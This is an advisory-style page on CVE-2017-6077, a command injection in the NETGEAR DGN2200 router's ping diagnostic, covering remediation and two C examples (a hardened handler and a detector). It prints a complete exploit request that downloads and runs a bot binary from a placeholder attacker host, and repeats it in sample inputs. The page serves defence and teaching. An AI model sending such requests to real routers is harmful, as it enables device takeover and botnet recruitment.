What Is NETGEAR DGN2200?
The NETGEAR DGN2200 is a DSL modem/wireless router designed for home and small business internet connectivity, incorporating ADSL2+ modem functionality with an 802.11n wireless access point. Like most consumer networking equipment, it includes a web-based management interface that provides diagnostic tools including ping and traceroute. The DGN2200 passes user-supplied ping target addresses directly to underlying OS commands without sanitization, enabling arbitrary command execution on the router.
Overview
CVE-2017-6077 is a critical OS command injection vulnerability in the NETGEAR DGN2200 wireless router. The router's diagnostic ping function passes the user-supplied target parameter into a system command without sanitizing it and, on vulnerable firmware, without requiring authentication, so an unauthenticated attacker can inject arbitrary shell commands that run as root on the router's embedded Linux system. The flaw was disclosed by security researcher Paulos Yibelo in February 2017. CISA added CVE-2017-6077 to the Known Exploited Vulnerabilities (KEV) catalog in March 2022, reflecting its continued use in IoT device exploitation campaigns.
Affected Versions
NETGEAR DGN2200 v1, v2, v3 and v4 hardware revisions running firmware older than the fixed release for that revision. Some hardware revisions may be end-of-life with no firmware update available; those devices can only be taken off the network or replaced (see Remediation).
Technical Details
Root Cause: Unsanitized Input in Ping Diagnostic CGI
CVE-2017-6077 is an OS command injection vulnerability (CWE-78) in the DGN2200's web management interface. The router's network diagnostic tools (ping, traceroute) are exposed through its web UI. The ping diagnostic accepts an IP address or hostname from the user, builds a shell command string around it and runs that string through the system shell, without filtering shell metacharacters from the input.
The vulnerable pattern, in pseudocode:
system("ping -c 4 " + user_input)
Because system() hands the string to /bin/sh -c, an attacker who places shell metacharacters (;, |, &&, backticks, $(...)) in the target parameter terminates the ping command and appends commands of their choosing. The request below shows the payload shape this flaw is abused for by IoT botnets: it clears /tmp, downloads a bot binary from the attacker's host, marks it executable and runs it.
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://attacker/bot+-O+/tmp/bot;chmod+777+/tmp/bot;/tmp/bot&curpath=/&currentsetting.htm=1
On vulnerable firmware the endpoint responds without authentication, so anyone who can reach the management interface (the LAN, or the WAN if remote management is enabled) can exploit it with a single HTTP request.
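The following is an added example, not NETGEAR's firmware code: a ping CGI handler written in the vulnerable shape the text describes, beside a hardened version that validates the target against an allowlist and executes ping through an argv array with no shell in the path. The function names (build_vulnerable_cmd, validate_ping_target, safe_ping) and the injected sample value are hypothetical, chosen for this illustration.

```c
/* Added example, not NETGEAR's firmware code: a ping CGI handler in the
 * vulnerable shape the page describes, beside a hardened version.
 * build_vulnerable_cmd, validate_ping_target and safe_ping are hypothetical
 * names chosen for this illustration. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* VULNERABLE shape: the target is pasted into a command line that system()
 * hands to "/bin/sh -c", so ';', '|', '&&', backticks and "$(...)" in the
 * target are interpreted by the shell. This function only builds the string
 * so it can be inspected; the real handler would call system(cmd).
 * Returns 1 on success, 0 if the buffer was too small. */
int build_vulnerable_cmd(const char *target, char *cmd, size_t len) {
    int n = snprintf(cmd, len, "ping -c 4 %s", target);
    return n >= 0 && (size_t)n < len;
}

/* Allowlist validation: a ping target is an IPv4/IPv6 literal or a hostname,
 * so accept only letters, digits, '.', '-' and ':' (1..253 chars). A leading
 * '-' is rejected because even without a shell it would reach ping as an
 * option (argument injection, e.g. "-f"). Returns 1 if acceptable. */
int validate_ping_target(const char *target) {
    size_t n = strlen(target);
    if (n == 0 || n > 253 || target[0] == '-') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)target[i];
        if (!(isalnum(c) || c == '.' || c == '-' || c == ':')) return 0;
    }
    return 1;
}

/* HARDENED: validate, then exec ping directly with an argv array. No shell is
 * involved, so metacharacters have no special meaning, and "--" ends option
 * parsing (where the platform's ping honours it) as a second line of defence.
 * Returns ping's exit status, or -1 if the target was rejected or the process
 * could not be started. */
int safe_ping(const char *target) {
    if (!validate_ping_target(target)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execlp("ping", "ping", "-c", "4", "--", target, (char *)NULL);
        _exit(127);                         /* only reached if exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed injected value in the shape of the page's sample payload. */
    const char *injected = "8.8.8.8;wget http://attacker/bot -O /tmp/bot;sh /tmp/bot";
    char cmd[512];
    if (build_vulnerable_cmd(injected, cmd, sizeof cmd))
        printf("vulnerable handler would run: sh -c \"%s\"\n", cmd);
    printf("validate(\"%s\") -> %d\n", injected, validate_ping_target(injected));
    printf("validate(\"8.8.8.8\") -> %d\n", validate_ping_target("8.8.8.8"));
    printf("safe_ping(\"%s\") -> %d (rejected before any process runs)\n",
           injected, safe_ping(injected));
    return 0;
}
```

The allowlist is the important half: switching from system() to exec alone stops shell injection but still lets a value such as "-f" reach ping as an option, which is why validate_ping_target rejects a leading dash and safe_ping adds "--" as well.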
Attack Characteristics
| Attribute | Detail |
|---|---|
| Attack Vector | Network — unauthenticated HTTP request |
| Endpoint | Ping/diagnostics CGI page |
| Authentication | None required on vulnerable firmware |
| Impact | Root command execution on router |
| Common Payload | IoT botnet malware download and execution |
Discovery
Discovered by security researcher Paulos Yibelo and publicly disclosed in February 2017. NETGEAR published a knowledge base article (KB30476) and released firmware updates.
Exploitation Context
- IoT botnet recruitment: Consumer routers with command injection vulnerabilities are prime targets for Mirai, Gafgyt, and successor IoT botnets; automated internet-wide scanning tools find vulnerable routers and execute one-liner payloads to download and install bot malware within seconds of identification
- DDoS infrastructure: Compromised home routers contribute their upstream bandwidth to DDoS attacks; NETGEAR router vulnerabilities have been incorporated into multiple botnet families that generated terabit-scale DDoS attacks
- Proxy infrastructure: Nation-state threat actors (particularly those attributed to China) use compromised home and small business routers as proxy infrastructure for staging attacks against high-value targets — the US DOJ has documented Volt Typhoon specifically using compromised SOHO routers as a proxy network
- Effectively persistent access: bot malware of the Mirai/Gafgyt class runs from memory and is lost on reboot, but an unpatched router that comes back online is typically re-infected within minutes by the same scanners; victims rarely notice, and routers are never "rebuilt" the way PCs are
- CISA KEV (2022): Added March 7, 2022 reflecting continued exploitation for botnet recruitment and as proxy infrastructure
Remediation
- Apply the NETGEAR firmware update: check NETGEAR's support site for DGN2200 firmware for your hardware revision and apply the latest available version through the router admin interface's Firmware Update function.
- Replace end-of-life hardware: if no firmware update is available for your hardware revision, replace the DGN2200 with a currently supported router model that still receives security patches.
- Disable remote management: make sure the DGN2200 management interface is not reachable from the internet (WAN side); disable Remote Management in the router settings so the attack surface is limited to LAN-side access.
- Change default admin credentials: even after patching, change the router admin password from the factory default to a strong, unique password.
- Check for compromise indicators: if the router may have been compromised, power-cycle it and perform a factory reset (memory-resident bot malware does not survive a reboot, and the reset discards attacker-modified settings), then apply the firmware update before reconnecting the WAN side or re-enabling any services; an unpatched router exposed again is typically re-infected within minutes.
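The sample exploit request above and the compromise check here share a detection problem: exploit traffic arrives percent-encoded, so a detector has to decode parameter values the way the CGI does before looking for metacharacters. The following is an added example, not from the page, NETGEAR or any IDS product: a detector that classifies HTTP request lines of the kind a reverse proxy, IDS or pcap parser in front of the router would hand it. The function names (is_dgn2200_injection, url_decode), the parameter names todo=ping and target, and the sample request lines are constructed for this illustration; only setup.cgi and todo=syscmd come from the request shown on the page.

```c
/* Added example, not from the page, NETGEAR or any IDS product: a detector
 * for request lines in the shape of the sample exploit above, meant to run
 * over HTTP request lines captured in front of the router. The function
 * names, the todo=ping/target parameters and the sample lines are
 * constructed for this illustration. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decode in place, mapping '+' to space as form encoding does.
 * Exploit traffic routinely carries ';' as %3B and spaces as '+', so
 * matching on the raw line misses it. */
static void url_decode(char *s) {
    char *w = s;
    for (const char *r = s; *r; r++) {
        if (*r == '+') { *w++ = ' '; continue; }
        if (*r == '%' && isxdigit((unsigned char)r[1]) && isxdigit((unsigned char)r[2])) {
            char hex[3] = { r[1], r[2], '\0' };
            *w++ = (char)strtol(hex, NULL, 16);
            r += 2;
            continue;
        }
        *w++ = *r;
    }
    *w = '\0';
}

/* Returns 1 if a request line ("GET /path?query HTTP/1.1") hits setup.cgi
 * with either the todo=syscmd command runner from the sample request or a
 * parameter value that, once decoded, contains shell metacharacters;
 * 0 otherwise. Parameters are split on '&' BEFORE decoding, as the CGI
 * itself does, so a %26 inside a value cannot hide as a parameter break. */
int is_dgn2200_injection(const char *request_line) {
    char buf[2048];
    snprintf(buf, sizeof buf, "%s", request_line);   /* private, writable copy */
    char *path = strchr(buf, ' ');
    if (!path) return 0;
    path++;                                          /* skip the method */
    char *sp = strchr(path, ' ');
    if (sp) *sp = '\0';                              /* drop " HTTP/1.1" */
    if (!strstr(path, "setup.cgi")) return 0;        /* endpoint shown on the page */
    char *kv = strchr(path, '?');
    if (!kv) return 0;
    kv++;
    while (kv && *kv) {
        char *next = strchr(kv, '&');
        if (next) *next++ = '\0';
        char *val = strchr(kv, '=');
        if (val) {
            *val++ = '\0';
            url_decode(kv);
            url_decode(val);
            if (strcmp(kv, "todo") == 0 && strcmp(val, "syscmd") == 0) return 1;
            if (strpbrk(val, ";|`\n") || strstr(val, "$(") || strstr(val, "&&")) return 1;
        }
        kv = next;
    }
    return 0;
}

int main(void) {
    /* Constructed sample request lines (not captured traffic). */
    const char *samples[] = {
        "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://attacker/bot+-O+/tmp/bot;chmod+777+/tmp/bot;/tmp/bot&curpath=/&currentsetting.htm=1 HTTP/1.1",
        "GET /setup.cgi?todo=ping&target=8.8.8.8%3Bid HTTP/1.1",
        "GET /setup.cgi?todo=ping&target=8.8.8.8%26%26id HTTP/1.1",
        "GET /setup.cgi?todo=ping&target=8.8.8.8 HTTP/1.1",
        "GET /index.htm HTTP/1.1",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%d  %s\n", is_dgn2200_injection(samples[i]), samples[i]);
    return 0;
}
```

Splitting on '&' before decoding mirrors the CGI: a raw, unencoded "&&" in the query becomes a parameter boundary for the router too, so it never reaches the shell, while "%26%26" survives into a single value and is correctly flagged.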
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2017-6077 |
| Vendor / Product | NETGEAR — Wireless Router DGN2200 |
| NVD Published | 2017-02-22 |
| NVD Last Modified | 2025-10-22 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') |
| CISA KEV Added | 2022-03-07 |
| CISA KEV Deadline | 2022-09-07 |
| Known Ransomware Use | No |
Timeline
| Date | Event |
|---|---|
| 2017-02-17 | Security researcher Paulos Yibelo discloses NETGEAR DGN2200 command injection vulnerability |
| 2017-02-22 | CVE-2017-6077 published by NVD |
| 2022-03-07 | Added to CISA Known Exploited Vulnerabilities catalog |
| 2022-09-07 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| NVD — CVE-2017-6077 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| NETGEAR KB — Ping and Traceroute Command Injection Security Vulnerability | Vendor Advisory |